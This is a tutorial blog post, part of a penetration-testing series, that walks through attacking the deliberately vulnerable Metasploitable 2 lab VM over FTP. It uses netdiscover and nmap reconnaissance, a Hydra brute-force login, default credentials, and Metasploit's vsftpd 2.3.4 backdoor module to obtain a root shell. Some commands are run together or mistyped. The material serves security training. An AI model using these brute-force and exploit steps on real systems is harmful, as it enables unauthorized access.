Penetration Testing Series: Hacking Metasploitable 2 By Exploiting FTP Port 21

Introduction
In this article, we delve into the intriguing realm of penetration testing by exploring the process of exploiting FTP Port 21 on the renowned vulnerable virtual machine, Metasploitable 2.
Metasploitable 2 is intentionally designed to be susceptible to various attacks and is a resource for security professionals to enhance their offensive security skills. By targeting Metasploitable 2’s vulnerable FTP service, we aim to provide an in-depth understanding of the techniques employed by ethical hackers and penetration testers to exploit and gain unauthorized access to systems.
FTP (File Transfer Protocol) is a widely used network protocol that facilitates the transfer of files between a client and a server over a computer network. While it remains an essential tool for data exchange, it also presents a potential avenue for attackers to breach a system. In this article, we focus on exploiting FTP Port 21; the default port FTP servers use for control and command operations.
Throughout this exploration, we will utilize the Metasploit Framework to illustrate how to take advantage of the vulnerabilities in the FTP service on Metasploitable 2 by employing commonly available modules and payloads. With this approach, we can access the target system without authorization.
It is important to emphasize that this article’s intent is solely educational and aimed at empowering security professionals and enthusiasts with knowledge on how to identify and secure their systems against potential threats. Understanding the tactics used by malicious actors is critical in developing robust defense mechanisms and implementing effective security measures.
Disclaimer:
All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.
Lab Setup
- VirtualBox
- Kali Linux Virtual Machine (VM)
- Metasploitable 2 VM
Exploiting Metasploitable 2’s FTP Service: Gaining Unauthorized Access through Port 21
Part 1: Reconnaissance
To begin, we need to gather information about the target system. Follow these steps:
- Use the ifconfig command to get the IP address of the Metasploitable 2 VM: 10.60.0.18.
ifconfig
2. In the Kali Linux VM, execute the “netdiscover” command to perform reconnaissance and find live hosts on the local network.
netdiscover -r 10.60.0.0/24
The netdiscover tool sends Address Resolution Protocol (ARP) requests to the network, allowing it to identify devices and their corresponding IP addresses. By listening to ARP replies, netdiscover can build a list of active hosts on the network and provide information such as IP addresses, MAC addresses, and device manufacturer details.
3. Note the IP address of the Metasploitable 2 VM (10.60.0.18) and its MAC address. Press “Ctrl + C” to exit netdiscover.


4. Use the “nmap” command to execute a network scan with specific options and save the output to “META2.txt.”
nmap -p- sV -oN META2.txt 10.60.0.18
The Nmap scan results show that FTP Port 21 is open on the target system.

Part 2: Create Username and Password List.
In this section, we will create our own username and password list. Follow these steps:
- Use the “nano” command to create a username file called “Users.txt.”
nano Users.txt

2. Input the desired usernames in the “Users.txt” file.

3. View the “Users.txt” file using the “cat” command.
cat Users.txt
4. Copy the usernames for later use.

5. Use the “nano” command to create a password file called “Passwords.txt.”
nano Passwords.txt
6. Paste all the usernames into the “Passwords.txt” file.

7. Use the “cat” command to view the passwords in the “Passwords.txt” file.
cat Passwords.txt

Part 3: Exploit Open FTP Port 21
Now that we have gathered the necessary information, we can exploit the FTP service on the target system. Follow these steps:

- We already know from the Nmap scan that FTP Port 21 is open, and the version of the FTP server is “vsftpd 2.3.4,” an older version with known vulnerabilities.
- Use the “hydra” command to execute the Hydra tool and perform a brute-force attack on the FTP service of the target system (IP address: 10.60.0.18) using the created username and password list.
hydra -L Users.txt -P Passwords.txt 10.60.0.18 ftp
Hydra will iterate through the wordlists and attempt to find valid credentials. If successful, we can use these credentials to gain FTP access to the server.

3. Type the following command to initiate an FTP client session and connect to the FTP server on the IP address 10.60.0.18.
ftp 10.60.0.18You can use any valid username and password combination from the successful Hydra results. We used “msfadmin” as the username and password in this case.
4. Congratulations! You have successfully gained unauthorized access to the Metasploitable 2 machine via FTP Port 21.
Name: msfadmin
Password: msfadmin

Part 4: Searchsploit
Another way to exploit FTP Port 21 is using a tool called “Searchsploit.” Follow these steps:
- Type “bye” to exit the FTP session.

2. Copy the FTP version information, “vsftpd 2.3.4.”

3. Use the “searchsploit” command to search for known exploits related to the specific version of the vsftpd FTP server software (2.3.4) in the Exploit Database (EDB).
searchsploit vsftpd 2.3.4
The searchsploit tool will display any known vulnerabilities associated with this version of FTP, including exploits such as backdoor command execution and others compatible with Metasploit.

Part 5: Metasploit
Metasploit is a robust framework for penetration testing and exploitation. Follow these steps to utilize Metasploit to gain access to the target system:
- Type “msfconsole” to launch the Metasploit Framework command-line interface.
msfconsole


2. Use the “search” command followed by the FTP version to search for information within the Metasploit Framework related to the vsftpd 2.3.4 FTP server version.
search vsftpd 2.3.4We received back one exploit, which matches the backdoor exploit found with Searchsploit.

3. Type “use 0” to select and use the backdoor exploit.
use 0
4. Type “show options” to view the required parameters that need to be set for the exploit.
show options
5. Fill in the required parameters, such as setting the RHOSTS (Remote Hosts) to the IP address of the target system (10.60.0.18).
6. Again, Type “show options” to confirm that you have set the RHOSTS correctly.
set RHOSTS 10.60.0.18show options
7. Finally, type “exploit” to execute the exploitation and gain access to the Metasploitable 2 machine via FTP Port 21.
exploit

Exploit was successful, and we now have a shell on the target system and can perform various actions.
If we type “whoami,” the response will be “root.”
When the command “ifconfig” is entered, the resulting output will display the IP address of the Metasploitable 2 virtual machine, indicated as 10.60.0.18.

8. To exit Metasploit, type the following commands:
Ctrl C
yexit
Conclusion
I appreciate you taking the time to read this article. Hopefully, the information presented has been helpful and valuable to you.
I aim to reach a wider audience and enlighten them about the potential risks of cyber-attacks, various types of penetration testing tools, and everything related to information technology.
If you would like to access more articles, please follow me.
Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!
The Gray Area is a collection of great cybersecurity and computer science posts. Become a writer for The Gray Area by filling out this form! To get updates whenever The Gray Area publishes an article, check out our Twitter page, @TGAonMedium.






